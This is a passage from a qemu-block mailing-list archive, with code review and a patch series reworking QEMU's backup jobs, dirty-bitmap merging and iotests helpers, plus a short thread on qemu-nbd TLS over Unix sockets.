date:20190705

Re: [Qemu-block] [Qemu-devel] [PATCH v2 01/18] qapi/block-core: Introduce BackupCommon

2019-07-05 Thread Markus Armbruster

John Snow  writes:

> On 7/5/19 10:14 AM, Markus Armbruster wrote:
>> John Snow  writes:
>> 
>>> drive-backup and blockdev-backup have an awful lot of things in common
>>> that are the same. Let's fix that.
>>>
>>> I don't deduplicate 'target', because the semantics actually did change
>>> between each structure. Leave that one alone so it can be documented
>>> separately.
>>>
>>> Signed-off-by: John Snow 
>>> ---
>>>  qapi/block-core.json | 103 ++-
>>>  1 file changed, 33 insertions(+), 70 deletions(-)
>>>
>>> diff --git a/qapi/block-core.json b/qapi/block-core.json
>>> index 0d43d4f37c..7b23efcf13 100644
>>> --- a/qapi/block-core.json
>>> +++ b/qapi/block-core.json
>>> @@ -1315,32 +1315,23 @@
>>>'data': { 'node': 'str', 'overlay': 'str' } }
>>>  
>>>  ##
>>> -# @DriveBackup:
>>> +# @BackupCommon:
>>>  #
>>>  # @job-id: identifier for the newly-created block job. If
>>>  #  omitted, the device name will be used. (Since 2.7)
>>>  #
>>>  # @device: the device name or node-name of a root node which should be 
>>> copied.
>>>  #
>>> -# @target: the target of the new image. If the file exists, or if it
>>> -#  is a device, the existing file/device will be used as the new
>>> -#  destination.  If it does not exist, a new file will be created.
>>> -#
>>> -# @format: the format of the new destination, default is to
>>> -#  probe if @mode is 'existing', else the format of the source
>>> -#
>>>  # @sync: what parts of the disk image should be copied to the destination
>>>  #(all the disk, only the sectors allocated in the topmost image, 
>>> from a
>>>  #dirty bitmap, or only new I/O).
>> 
>> This is DriveBackup's wording.  Blockdev lacks "from a dirty bitmap, ".
>> Is this a doc fix?
>
> Yes.

Worth mentioning in the commit message?

>>>  #
>>> -# @mode: whether and how QEMU should create a new image, default is
>>> -#'absolute-paths'.
>>> -#
>>> -# @speed: the maximum speed, in bytes per second
>>> +# @speed: the maximum speed, in bytes per second. The default is 0,
>>> +# for unlimited.
>> 
>> This is Blockdev's wording.  DriveBackup lacks "the default is 0, for
>> unlimited."  Is this a doc fix?
>
> Yes.

Worth mentioning in the commit message?

[...]

Re: [Qemu-block] [PATCH v2 RFC] qemu-nbd: Permit TLS with Unix sockets

2019-07-05 Thread Eric Blake

On 7/5/19 4:31 AM, Max Reitz wrote:
> On 04.07.19 00:47, Eric Blake wrote:
>> Although you generally won't use encryption with a Unix socket (after
>> all, everything is local, so why waste the CPU power), there are
>> situations in testsuites where Unix sockets are much nicer than TCP
>> sockets.  Since nbdkit allows encryption over both types of sockets,
>> it makes sense for qemu-nbd to do likewise.
> 
> Hmm.  The code is simple enough, so I don’t see a good reason not to.
> 

> Um, also, a perhaps stupid question: Why is there no passing test for
> client authorization?
> 

Not a stupid question. It's copy-and-paste from the existing test over
TCP, which Dan added in b25e12daf without any additional successful test
I guess the earlier tests in the file are the success cases, and this
just checks that authz restrictions cover the expected failure case of
something that would succeed without authz? Or maybe that commit really
is incomplete?

-- 
Eric Blake, Principal Software Engineer
Red Hat, Inc.   +1-919-301-3226
Virtualization:  qemu.org | libvirt.org

signature.asc
Description: OpenPGP digital signature

[Qemu-block] [PATCH v3 17/18] iotests: add test 257 for bitmap-mode backups

2019-07-05 Thread John Snow

Signed-off-by: John Snow 
---
 tests/qemu-iotests/257 |  409 +++
 tests/qemu-iotests/257.out | 2199 
 tests/qemu-iotests/group   |1 +
 3 files changed, 2609 insertions(+)
 create mode 100755 tests/qemu-iotests/257
 create mode 100644 tests/qemu-iotests/257.out

diff --git a/tests/qemu-iotests/257 b/tests/qemu-iotests/257
new file mode 100755
index 00..fd3b3328d8
--- /dev/null
+++ b/tests/qemu-iotests/257
@@ -0,0 +1,409 @@
+#!/usr/bin/env python
+#
+# Test bitmap-sync backups (incremental, differential, and partials)
+#
+# Copyright (c) 2019 John Snow for Red Hat, Inc.
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License as published by
+# the Free Software Foundation; either version 2 of the License, or
+# (at your option) any later version.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program.  If not, see .
+#
+# owner=js...@redhat.com
+
+from collections import namedtuple
+import math
+import os
+
+import iotests
+from iotests import log, qemu_img
+
+SIZE = 64 * 1024 * 1024
+GRANULARITY = 64 * 1024
+
+Pattern = namedtuple('Pattern', ['byte', 'offset', 'size'])
+def mkpattern(byte, offset, size=GRANULARITY):
+"""Constructor for Pattern() with default size"""
+return Pattern(byte, offset, size)
+
+class PatternGroup:
+"""Grouping of Pattern objects. Initialize with an iterable of Patterns."""
+def __init__(self, patterns):
+self.patterns = patterns
+
+def bits(self, granularity):
+"""Calculate the unique bits dirtied by this pattern grouping"""
+res = set()
+for pattern in self.patterns:
+lower = math.floor(pattern.offset / granularity)
+upper = math.floor((pattern.offset + pattern.size - 1) / 
granularity)
+res = res | set(range(lower, upper + 1))
+return res
+
+GROUPS = [
+PatternGroup([
+# Batch 0: 4 clusters
+mkpattern('0x49', 0x000),
+mkpattern('0x6c', 0x010),   # 1M
+mkpattern('0x6f', 0x200),   # 32M
+mkpattern('0x76', 0x3ff)]), # 64M - 64K
+PatternGroup([
+# Batch 1: 6 clusters (3 new)
+mkpattern('0x65', 0x000),   # Full overwrite
+mkpattern('0x77', 0x00f8000),   # Partial-left (1M-32K)
+mkpattern('0x72', 0x2008000),   # Partial-right (32M+32K)
+mkpattern('0x69', 0x3fe)]), # Adjacent-left (64M - 128K)
+PatternGroup([
+# Batch 2: 7 clusters (3 new)
+mkpattern('0x74', 0x001),   # Adjacent-right
+mkpattern('0x69', 0x00e8000),   # Partial-left  (1M-96K)
+mkpattern('0x6e', 0x2018000),   # Partial-right (32M+96K)
+mkpattern('0x67', 0x3fe,
+  2*GRANULARITY)]), # Overwrite [(64M-128K)-64M)
+PatternGroup([
+# Batch 3: 8 clusters (5 new)
+# Carefully chosen such that nothing re-dirties the one cluster
+# that copies out successfully before failure in Group #1.
+mkpattern('0xaa', 0x001,
+  3*GRANULARITY),   # Overwrite and 2x Adjacent-right
+mkpattern('0xbb', 0x00d8000),   # Partial-left (1M-160K)
+mkpattern('0xcc', 0x2028000),   # Partial-right (32M+160K)
+mkpattern('0xdd', 0x3fc)]), # New; leaving a gap to the right
+]
+
+class Drive:
+"""Represents, vaguely, a drive attached to a VM.
+Includes format, graph, and device information."""
+
+def __init__(self, path, vm=None):
+self.path = path
+self.vm = vm
+self.fmt = None
+self.size = None
+self.node = None
+self.device = None
+
+@property
+def name(self):
+return self.node or self.device
+
+def img_create(self, fmt, size):
+self.fmt = fmt
+self.size = size
+iotests.qemu_img_create('-f', self.fmt, self.path, str(self.size))
+
+def create_target(self, name, fmt, size):
+basename = os.path.basename(self.path)
+file_node_name = "file_{}".format(basename)
+vm = self.vm
+
+log(vm.command('blockdev-create', job_id='bdc-file-job',
+   options={
+   'driver': 'file',
+   'filename': self.path,
+   'size': 0,
+   }))
+vm.run_job('bdc-file-job')
+log(vm.command('blockdev-add', driver='file',
+   node_name=file_node_name, filename=self.path))
+
+log(vm.command('blockdev-create', job_id='bdc-fmt-job',
+   options={
+

[Qemu-block] [PATCH v3 18/18] block/backup: loosen restriction on readonly bitmaps

2019-07-05 Thread John Snow

With the "never" sync policy, we actually can utilize readonly bitmaps
now. Loosen the check at the QMP level, and tighten it based on
provided arguments down at the job creation level instead.

Reviewed-by: Max Reitz 
Signed-off-by: John Snow 
---
 block/backup.c | 6 ++
 blockdev.c | 2 +-
 2 files changed, 7 insertions(+), 1 deletion(-)

diff --git a/block/backup.c b/block/backup.c
index b25e6179cf..a59962cea8 100644
--- a/block/backup.c
+++ b/block/backup.c
@@ -607,6 +607,12 @@ BlockJob *backup_job_create(const char *job_id, 
BlockDriverState *bs,
 return NULL;
 }
 
+/* If we need to write to this bitmap, check that we can: */
+if (bitmap_mode != BITMAP_SYNC_MODE_NEVER &&
+bdrv_dirty_bitmap_check(sync_bitmap, BDRV_BITMAP_DEFAULT, errp)) {
+return NULL;
+}
+
 /* Create a new bitmap, and freeze/disable this one. */
 if (bdrv_dirty_bitmap_create_successor(bs, sync_bitmap, errp) < 0) {
 return NULL;
diff --git a/blockdev.c b/blockdev.c
index 5dfaa976c9..3e30bc2ca7 100644
--- a/blockdev.c
+++ b/blockdev.c
@@ -3489,7 +3489,7 @@ static BlockJob *do_backup_common(BackupCommon *backup,
"when providing a bitmap");
 return NULL;
 }
-if (bdrv_dirty_bitmap_check(bmap, BDRV_BITMAP_DEFAULT, errp)) {
+if (bdrv_dirty_bitmap_check(bmap, BDRV_BITMAP_ALLOW_RO, errp)) {
 return NULL;
 }
 }
-- 
2.21.0

[Qemu-block] [PATCH v3 16/18] iotests: Add virtio-scsi device helper

2019-07-05 Thread John Snow

Seems that it comes up enough.

Reviewed-by: Max Reitz 
Signed-off-by: John Snow 
---
 tests/qemu-iotests/040| 6 +-
 tests/qemu-iotests/093| 6 ++
 tests/qemu-iotests/139| 7 ++-
 tests/qemu-iotests/238| 5 +
 tests/qemu-iotests/iotests.py | 4 
 5 files changed, 10 insertions(+), 18 deletions(-)

diff --git a/tests/qemu-iotests/040 b/tests/qemu-iotests/040
index b81133a474..657b37103c 100755
--- a/tests/qemu-iotests/040
+++ b/tests/qemu-iotests/040
@@ -85,11 +85,7 @@ class TestSingleDrive(ImageCommitTestCase):
 qemu_io('-f', 'raw', '-c', 'write -P 0xab 0 524288', backing_img)
 qemu_io('-f', iotests.imgfmt, '-c', 'write -P 0xef 524288 524288', 
mid_img)
 self.vm = iotests.VM().add_drive(test_img, 
"node-name=top,backing.node-name=mid,backing.backing.node-name=base", 
interface="none")
-if iotests.qemu_default_machine == 's390-ccw-virtio':
-self.vm.add_device("virtio-scsi-ccw")
-else:
-self.vm.add_device("virtio-scsi-pci")
-
+self.vm.add_device(iotests.get_virtio_scsi_device())
 self.vm.add_device("scsi-hd,id=scsi0,drive=drive0")
 self.vm.launch()
 
diff --git a/tests/qemu-iotests/093 b/tests/qemu-iotests/093
index d88fbc182e..46153220f8 100755
--- a/tests/qemu-iotests/093
+++ b/tests/qemu-iotests/093
@@ -366,10 +366,8 @@ class ThrottleTestGroupNames(iotests.QMPTestCase):
 class ThrottleTestRemovableMedia(iotests.QMPTestCase):
 def setUp(self):
 self.vm = iotests.VM()
-if iotests.qemu_default_machine == 's390-ccw-virtio':
-self.vm.add_device("virtio-scsi-ccw,id=virtio-scsi")
-else:
-self.vm.add_device("virtio-scsi-pci,id=virtio-scsi")
+self.vm.add_device("{},id=virtio-scsi".format(
+iotests.get_virtio_scsi_device()))
 self.vm.launch()
 
 def tearDown(self):
diff --git a/tests/qemu-iotests/139 b/tests/qemu-iotests/139
index 933b45121a..2176ea51ba 100755
--- a/tests/qemu-iotests/139
+++ b/tests/qemu-iotests/139
@@ -35,11 +35,8 @@ class TestBlockdevDel(iotests.QMPTestCase):
 def setUp(self):
 iotests.qemu_img('create', '-f', iotests.imgfmt, base_img, '1M')
 self.vm = iotests.VM()
-if iotests.qemu_default_machine == 's390-ccw-virtio':
-self.vm.add_device("virtio-scsi-ccw,id=virtio-scsi")
-else:
-self.vm.add_device("virtio-scsi-pci,id=virtio-scsi")
-
+self.vm.add_device("{},id=virtio-scsi".format(
+iotests.get_virtio_scsi_device()))
 self.vm.launch()
 
 def tearDown(self):
diff --git a/tests/qemu-iotests/238 b/tests/qemu-iotests/238
index 1c0a46fa90..387a77b2cd 100755
--- a/tests/qemu-iotests/238
+++ b/tests/qemu-iotests/238
@@ -23,10 +23,7 @@ import os
 import iotests
 from iotests import log
 
-if iotests.qemu_default_machine == 's390-ccw-virtio':
-virtio_scsi_device = 'virtio-scsi-ccw'
-else:
-virtio_scsi_device = 'virtio-scsi-pci'
+virtio_scsi_device = iotests.get_virtio_scsi_device()
 
 vm = iotests.VM()
 vm.launch()
diff --git a/tests/qemu-iotests/iotests.py b/tests/qemu-iotests/iotests.py
index 6135c9663d..8ae7bc353e 100644
--- a/tests/qemu-iotests/iotests.py
+++ b/tests/qemu-iotests/iotests.py
@@ -164,6 +164,10 @@ def qemu_io_silent(*args):
  (-exitcode, ' '.join(args)))
 return exitcode
 
+def get_virtio_scsi_device():
+if qemu_default_machine == 's390-ccw-virtio':
+return 'virtio-scsi-ccw'
+return 'virtio-scsi-pci'
 
 class QemuIoInteractive:
 def __init__(self, *args):
-- 
2.21.0

[Qemu-block] [PATCH v3 09/18] block/dirty-bitmap: add bdrv_dirty_bitmap_merge_internal

2019-07-05 Thread John Snow

I'm surprised it didn't come up sooner, but sometimes we have a +busy
bitmap as a source. This is dangerous from the QMP API, but if we are
the owner that marked the bitmap busy, it's safe to merge it using it as
a read only source.

It is not safe in the general case to allow users to read from in-use
bitmaps, so create an internal variant that foregoes the safety
checking.

Signed-off-by: John Snow 
---
 block/dirty-bitmap.c  | 50 +++
 include/block/block_int.h |  3 +++
 2 files changed, 48 insertions(+), 5 deletions(-)

diff --git a/block/dirty-bitmap.c b/block/dirty-bitmap.c
index 95a9c2a5d8..c5b66ae9ed 100644
--- a/block/dirty-bitmap.c
+++ b/block/dirty-bitmap.c
@@ -810,6 +810,12 @@ bool bdrv_dirty_bitmap_next_dirty_area(BdrvDirtyBitmap 
*bitmap,
 return hbitmap_next_dirty_area(bitmap->bitmap, offset, bytes);
 }
 
+/**
+ * bdrv_merge_dirty_bitmap: merge src into dest.
+ * Ensures permissions on bitmaps are reasonable; use for public API.
+ *
+ * @backup: If provided, make a copy of dest here prior to merge.
+ */
 void bdrv_merge_dirty_bitmap(BdrvDirtyBitmap *dest, const BdrvDirtyBitmap *src,
  HBitmap **backup, Error **errp)
 {
@@ -833,6 +839,38 @@ void bdrv_merge_dirty_bitmap(BdrvDirtyBitmap *dest, const 
BdrvDirtyBitmap *src,
 goto out;
 }
 
+ret = bdrv_dirty_bitmap_merge_internal(dest, src, backup, false);
+assert(ret);
+
+out:
+qemu_mutex_unlock(dest->mutex);
+if (src->mutex != dest->mutex) {
+qemu_mutex_unlock(src->mutex);
+}
+}
+
+/**
+ * bdrv_dirty_bitmap_merge_internal: merge src into dest.
+ * Does NOT check bitmap permissions; not suitable for use as public API.
+ *
+ * @backup: If provided, make a copy of dest here prior to merge.
+ * @lock: If true, lock and unlock bitmaps on the way in/out.
+ * returns true if the merge succeeded; false if unattempted.
+ */
+bool bdrv_dirty_bitmap_merge_internal(BdrvDirtyBitmap *dest,
+  const BdrvDirtyBitmap *src,
+  HBitmap **backup,
+  bool lock)
+{
+bool ret;
+
+if (lock) {
+qemu_mutex_lock(dest->mutex);
+if (src->mutex != dest->mutex) {
+qemu_mutex_lock(src->mutex);
+}
+}
+
 if (backup) {
 *backup = dest->bitmap;
 dest->bitmap = hbitmap_alloc(dest->size, hbitmap_granularity(*backup));
@@ -840,11 +878,13 @@ void bdrv_merge_dirty_bitmap(BdrvDirtyBitmap *dest, const 
BdrvDirtyBitmap *src,
 } else {
 ret = hbitmap_merge(dest->bitmap, src->bitmap, dest->bitmap);
 }
-assert(ret);
 
-out:
-qemu_mutex_unlock(dest->mutex);
-if (src->mutex != dest->mutex) {
-qemu_mutex_unlock(src->mutex);
+if (lock) {
+qemu_mutex_unlock(dest->mutex);
+if (src->mutex != dest->mutex) {
+qemu_mutex_unlock(src->mutex);
+}
 }
+
+return ret;
 }
diff --git a/include/block/block_int.h b/include/block/block_int.h
index e1f2aa627e..83ffdf4950 100644
--- a/include/block/block_int.h
+++ b/include/block/block_int.h
@@ -1238,6 +1238,9 @@ void bdrv_set_dirty(BlockDriverState *bs, int64_t offset, 
int64_t bytes);
 
 void bdrv_clear_dirty_bitmap(BdrvDirtyBitmap *bitmap, HBitmap **out);
 void bdrv_restore_dirty_bitmap(BdrvDirtyBitmap *bitmap, HBitmap *backup);
+bool bdrv_dirty_bitmap_merge_internal(BdrvDirtyBitmap *dest,
+  const BdrvDirtyBitmap *src,
+  HBitmap **backup, bool lock);
 
 void bdrv_inc_in_flight(BlockDriverState *bs);
 void bdrv_dec_in_flight(BlockDriverState *bs);
-- 
2.21.0

[Qemu-block] [PATCH v3 08/18] hbitmap: enable merging across granularities

2019-07-05 Thread John Snow

Reviewed-by: Max Reitz 
Signed-off-by: John Snow 
---
 util/hbitmap.c | 36 +++-
 1 file changed, 35 insertions(+), 1 deletion(-)

diff --git a/util/hbitmap.c b/util/hbitmap.c
index 3b6acae42b..306bc4876d 100644
--- a/util/hbitmap.c
+++ b/util/hbitmap.c
@@ -777,7 +777,27 @@ void hbitmap_truncate(HBitmap *hb, uint64_t size)
 
 bool hbitmap_can_merge(const HBitmap *a, const HBitmap *b)
 {
-return (a->size == b->size) && (a->granularity == b->granularity);
+return (a->orig_size == b->orig_size);
+}
+
+/**
+ * hbitmap_sparse_merge: performs dst = dst | src
+ * works with differing granularities.
+ * best used when src is sparsely populated.
+ */
+static void hbitmap_sparse_merge(HBitmap *dst, const HBitmap *src)
+{
+uint64_t offset = 0;
+uint64_t count = src->orig_size;
+
+while (hbitmap_next_dirty_area(src, , )) {
+hbitmap_set(dst, offset, count);
+offset += count;
+if (offset >= src->orig_size) {
+break;
+}
+count = src->orig_size - offset;
+}
 }
 
 /**
@@ -808,10 +828,24 @@ bool hbitmap_merge(const HBitmap *a, const HBitmap *b, 
HBitmap *result)
 return true;
 }
 
+if (a->granularity != b->granularity) {
+if ((a != result) && (b != result)) {
+hbitmap_reset_all(result);
+}
+if (a != result) {
+hbitmap_sparse_merge(result, a);
+}
+if (b != result) {
+hbitmap_sparse_merge(result, b);
+}
+return true;
+}
+
 /* This merge is O(size), as BITS_PER_LONG and HBITMAP_LEVELS are constant.
  * It may be possible to improve running times for sparsely populated maps
  * by using hbitmap_iter_next, but this is suboptimal for dense maps.
  */
+assert(a->size == b->size);
 for (i = HBITMAP_LEVELS - 1; i >= 0; i--) {
 for (j = 0; j < a->sizes[i]; j++) {
 result->levels[i][j] = a->levels[i][j] | b->levels[i][j];
-- 
2.21.0

[Qemu-block] [PATCH v3 14/18] iotests: teach run_job to cancel pending jobs

2019-07-05 Thread John Snow

run_job can cancel pending jobs to simulate failure. This lets us use
the pending callback to issue test commands while the job is open, but
then still have the job fail in the end.

Reviewed-by: Max Reitz 
Signed-off-by: John Snow 
---
 tests/qemu-iotests/iotests.py | 22 --
 1 file changed, 20 insertions(+), 2 deletions(-)

diff --git a/tests/qemu-iotests/iotests.py b/tests/qemu-iotests/iotests.py
index fcad957d63..c544659ecb 100644
--- a/tests/qemu-iotests/iotests.py
+++ b/tests/qemu-iotests/iotests.py
@@ -541,7 +541,22 @@ class VM(qtest.QEMUQtestMachine):
 
 # Returns None on success, and an error string on failure
 def run_job(self, job, auto_finalize=True, auto_dismiss=False,
-pre_finalize=None, wait=60.0):
+pre_finalize=None, cancel=False, wait=60.0):
+"""
+run_job moves a job from creation through to dismissal.
+
+:param job: String. ID of recently-launched job
+:param auto_finalize: Bool. True if the job was launched with
+  auto_finalize. Defaults to True.
+:param auto_dismiss: Bool. True if the job was launched with
+ auto_dismiss=True. Defaults to False.
+:param pre_finalize: Callback. A callable that takes no arguments to be
+ invoked prior to issuing job-finalize, if any.
+:param cancel: Bool. When true, cancels the job after the pre_finalize
+   callback.
+:param wait: Float. Timeout value specifying how long to wait for any
+ event, in seconds. Defaults to 60.0.
+"""
 match_device = {'data': {'device': job}}
 match_id = {'data': {'id': job}}
 events = [
@@ -568,7 +583,10 @@ class VM(qtest.QEMUQtestMachine):
 elif status == 'pending' and not auto_finalize:
 if pre_finalize:
 pre_finalize()
-self.qmp_log('job-finalize', id=job)
+if cancel:
+self.qmp_log('job-cancel', id=job)
+else:
+self.qmp_log('job-finalize', id=job)
 elif status == 'concluded' and not auto_dismiss:
 self.qmp_log('job-dismiss', id=job)
 elif status == 'null':
-- 
2.21.0

[Qemu-block] [PATCH v3 15/18] iotests: teach FilePath to produce multiple paths

2019-07-05 Thread John Snow

Use "FilePaths" instead of "FilePath" to request multiple files be
cleaned up after we leave that object's scope.

This is not crucial; but it saves a little typing.

Reviewed-by: Max Reitz 
Signed-off-by: John Snow 
---
 tests/qemu-iotests/iotests.py | 34 --
 1 file changed, 24 insertions(+), 10 deletions(-)

diff --git a/tests/qemu-iotests/iotests.py b/tests/qemu-iotests/iotests.py
index c544659ecb..6135c9663d 100644
--- a/tests/qemu-iotests/iotests.py
+++ b/tests/qemu-iotests/iotests.py
@@ -358,31 +358,45 @@ class Timeout:
 def timeout(self, signum, frame):
 raise Exception(self.errmsg)
 
+def file_pattern(name):
+return "{0}-{1}".format(os.getpid(), name)
 
-class FilePath(object):
-'''An auto-generated filename that cleans itself up.
+class FilePaths(object):
+"""
+FilePaths is an auto-generated filename that cleans itself up.
 
 Use this context manager to generate filenames and ensure that the file
 gets deleted::
 
-with TestFilePath('test.img') as img_path:
+with FilePaths(['test.img']) as img_path:
 qemu_img('create', img_path, '1G')
 # migration_sock_path is automatically deleted
-'''
-def __init__(self, name):
-filename = '{0}-{1}'.format(os.getpid(), name)
-self.path = os.path.join(test_dir, filename)
+"""
+def __init__(self, names):
+self.paths = []
+for name in names:
+self.paths.append(os.path.join(test_dir, file_pattern(name)))
 
 def __enter__(self):
-return self.path
+return self.paths
 
 def __exit__(self, exc_type, exc_val, exc_tb):
 try:
-os.remove(self.path)
+for path in self.paths:
+os.remove(path)
 except OSError:
 pass
 return False
 
+class FilePath(FilePaths):
+"""
+FilePath is a specialization of FilePaths that takes a single filename.
+"""
+def __init__(self, name):
+super(FilePath, self).__init__([name])
+
+def __enter__(self):
+return self.paths[0]
 
 def file_path_remover():
 for path in reversed(file_path_remover.paths):
@@ -407,7 +421,7 @@ def file_path(*names):
 
 paths = []
 for name in names:
-filename = '{0}-{1}'.format(os.getpid(), name)
+filename = file_pattern(name)
 path = os.path.join(test_dir, filename)
 file_path_remover.paths.append(path)
 paths.append(path)
-- 
2.21.0

[Qemu-block] [PATCH v3 05/18] block/backup: Add mirror sync mode 'bitmap'

2019-07-05 Thread John Snow

We don't need or want a new sync mode for simple differences in
semantics.  Create a new mode simply named "BITMAP" that is designed to
make use of the new Bitmap Sync Mode field.

Because the only bitmap sync mode is 'on-success', this adds no new
functionality to the backup job (yet). The old incremental backup mode
is maintained as a syntactic sugar for sync=bitmap, mode=on-success.

Add all of the plumbing necessary to support this new instruction.

Signed-off-by: John Snow 
---
 block/backup.c| 20 
 block/mirror.c|  6 --
 block/replication.c   |  2 +-
 blockdev.c| 25 +++--
 include/block/block_int.h |  4 +++-
 qapi/block-core.json  | 21 +++--
 6 files changed, 58 insertions(+), 20 deletions(-)

diff --git a/block/backup.c b/block/backup.c
index 715e1d3be8..996941fa61 100644
--- a/block/backup.c
+++ b/block/backup.c
@@ -38,9 +38,9 @@ typedef struct CowRequest {
 typedef struct BackupBlockJob {
 BlockJob common;
 BlockBackend *target;
-/* bitmap for sync=incremental */
 BdrvDirtyBitmap *sync_bitmap;
 MirrorSyncMode sync_mode;
+BitmapSyncMode bitmap_mode;
 BlockdevOnError on_source_error;
 BlockdevOnError on_target_error;
 CoRwlock flush_rwlock;
@@ -452,7 +452,7 @@ static int coroutine_fn backup_run(Job *job, Error **errp)
 
 job_progress_set_remaining(job, s->len);
 
-if (s->sync_mode == MIRROR_SYNC_MODE_INCREMENTAL) {
+if (s->sync_mode == MIRROR_SYNC_MODE_BITMAP) {
 backup_incremental_init_copy_bitmap(s);
 } else {
 hbitmap_set(s->copy_bitmap, 0, s->len);
@@ -536,6 +536,7 @@ static int64_t 
backup_calculate_cluster_size(BlockDriverState *target,
 BlockJob *backup_job_create(const char *job_id, BlockDriverState *bs,
   BlockDriverState *target, int64_t speed,
   MirrorSyncMode sync_mode, BdrvDirtyBitmap *sync_bitmap,
+  BitmapSyncMode bitmap_mode,
   bool compress,
   BlockdevOnError on_source_error,
   BlockdevOnError on_target_error,
@@ -583,10 +584,13 @@ BlockJob *backup_job_create(const char *job_id, 
BlockDriverState *bs,
 return NULL;
 }
 
-if (sync_mode == MIRROR_SYNC_MODE_INCREMENTAL) {
+/* QMP interface should have handled translating this to bitmap mode */
+assert(sync_mode != MIRROR_SYNC_MODE_INCREMENTAL);
+
+if (sync_mode == MIRROR_SYNC_MODE_BITMAP) {
 if (!sync_bitmap) {
 error_setg(errp, "must provide a valid bitmap name for "
- "\"incremental\" sync mode");
+   "'%s' sync mode", MirrorSyncMode_str(sync_mode));
 return NULL;
 }
 
@@ -596,8 +600,8 @@ BlockJob *backup_job_create(const char *job_id, 
BlockDriverState *bs,
 }
 } else if (sync_bitmap) {
 error_setg(errp,
-   "a sync_bitmap was provided to backup_run, "
-   "but received an incompatible sync_mode (%s)",
+   "a bitmap was given to backup_job_create, "
+   "but it received an incompatible sync_mode (%s)",
MirrorSyncMode_str(sync_mode));
 return NULL;
 }
@@ -639,8 +643,8 @@ BlockJob *backup_job_create(const char *job_id, 
BlockDriverState *bs,
 job->on_source_error = on_source_error;
 job->on_target_error = on_target_error;
 job->sync_mode = sync_mode;
-job->sync_bitmap = sync_mode == MIRROR_SYNC_MODE_INCREMENTAL ?
-   sync_bitmap : NULL;
+job->sync_bitmap = sync_bitmap;
+job->bitmap_mode = bitmap_mode;
 job->compress = compress;
 
 /* Detect image-fleecing (and similar) schemes */
diff --git a/block/mirror.c b/block/mirror.c
index d17be4cdbc..42b3d9acd0 100644
--- a/block/mirror.c
+++ b/block/mirror.c
@@ -1717,8 +1717,10 @@ void mirror_start(const char *job_id, BlockDriverState 
*bs,
 bool is_none_mode;
 BlockDriverState *base;
 
-if (mode == MIRROR_SYNC_MODE_INCREMENTAL) {
-error_setg(errp, "Sync mode 'incremental' not supported");
+if ((mode == MIRROR_SYNC_MODE_INCREMENTAL) ||
+(mode == MIRROR_SYNC_MODE_BITMAP)) {
+error_setg(errp, "Sync mode '%s' not supported",
+   MirrorSyncMode_str(mode));
 return;
 }
 is_none_mode = mode == MIRROR_SYNC_MODE_NONE;
diff --git a/block/replication.c b/block/replication.c
index b41bc507c0..5475217c69 100644
--- a/block/replication.c
+++ b/block/replication.c
@@ -543,7 +543,7 @@ static void replication_start(ReplicationState *rs, 
ReplicationMode mode,
 
 s->backup_job = backup_job_create(
 NULL, s->secondary_disk->bs, 
s->hidden_disk->bs,
-0, MIRROR_SYNC_MODE_NONE, NULL, false,
+0, MIRROR_SYNC_MODE_NONE, NULL, 0, false,

[Qemu-block] [PATCH v3 13/18] iotests: add testing shim for script-style python tests

2019-07-05 Thread John Snow

Because the new-style python tests don't use the iotests.main() test
launcher, we don't turn on the debugger logging for these scripts
when invoked via ./check -d.

Refactor the launcher shim into new and old style shims so that they
share environmental configuration.

Two cleanup notes: debug was not actually used as a global, and there
was no reason to create a class in an inner scope just to achieve
default variables; we can simply create an instance of the runner with
the values we want instead.

Reviewed-by: Max Reitz 
Signed-off-by: John Snow 
---
 tests/qemu-iotests/iotests.py | 40 +++
 1 file changed, 26 insertions(+), 14 deletions(-)

diff --git a/tests/qemu-iotests/iotests.py b/tests/qemu-iotests/iotests.py
index 3ecef5bc90..fcad957d63 100644
--- a/tests/qemu-iotests/iotests.py
+++ b/tests/qemu-iotests/iotests.py
@@ -61,7 +61,6 @@ cachemode = os.environ.get('CACHEMODE')
 qemu_default_machine = os.environ.get('QEMU_DEFAULT_MACHINE')
 
 socket_scm_helper = os.environ.get('SOCKET_SCM_HELPER', 'socket_scm_helper')
-debug = False
 
 luks_default_secret_object = 'secret,id=keysec0,data=' + \
  os.environ.get('IMGKEYSECRET', '')
@@ -834,11 +833,22 @@ def skip_if_unsupported(required_formats=[], 
read_only=False):
 return func_wrapper
 return skip_test_decorator
 
-def main(supported_fmts=[], supported_oses=['linux'], supported_cache_modes=[],
- unsupported_fmts=[]):
-'''Run tests'''
+def execute_unittest(output, verbosity, debug):
+runner = unittest.TextTestRunner(stream=output, descriptions=True,
+ verbosity=verbosity)
+try:
+# unittest.main() will use sys.exit(); so expect a SystemExit
+# exception
+unittest.main(testRunner=runner)
+finally:
+if not debug:
+sys.stderr.write(re.sub(r'Ran (\d+) tests? in [\d.]+s',
+r'Ran \1 tests', output.getvalue()))
 
-global debug
+def execute_test(test_function=None,
+ supported_fmts=[], supported_oses=['linux'],
+ supported_cache_modes=[], unsupported_fmts=[]):
+"""Run either unittest or script-style tests."""
 
 # We are using TEST_DIR and QEMU_DEFAULT_MACHINE as proxies to
 # indicate that we're not being run via "check". There may be
@@ -870,13 +880,15 @@ def main(supported_fmts=[], supported_oses=['linux'], 
supported_cache_modes=[],
 
 logging.basicConfig(level=(logging.DEBUG if debug else logging.WARN))
 
-class MyTestRunner(unittest.TextTestRunner):
-def __init__(self, stream=output, descriptions=True, 
verbosity=verbosity):
-unittest.TextTestRunner.__init__(self, stream, descriptions, 
verbosity)
+if not test_function:
+execute_unittest(output, verbosity, debug)
+else:
+test_function()
 
-# unittest.main() will use sys.exit() so expect a SystemExit exception
-try:
-unittest.main(testRunner=MyTestRunner)
-finally:
-if not debug:
-sys.stderr.write(re.sub(r'Ran (\d+) tests? in [\d.]+s', r'Ran \1 
tests', output.getvalue()))
+def script_main(test_function, *args, **kwargs):
+"""Run script-style tests outside of the unittest framework"""
+execute_test(test_function, *args, **kwargs)
+
+def main(*args, **kwargs):
+"""Run tests using the unittest framework"""
+execute_test(None, *args, **kwargs)
-- 
2.21.0

[Qemu-block] [PATCH v3 11/18] block/backup: upgrade copy_bitmap to BdrvDirtyBitmap

2019-07-05 Thread John Snow

This simplifies some interface matters; namely the initialization and
(later) merging the manifest back into the sync_bitmap if it was
provided.

Signed-off-by: John Snow 
---
 block/backup.c | 81 ++
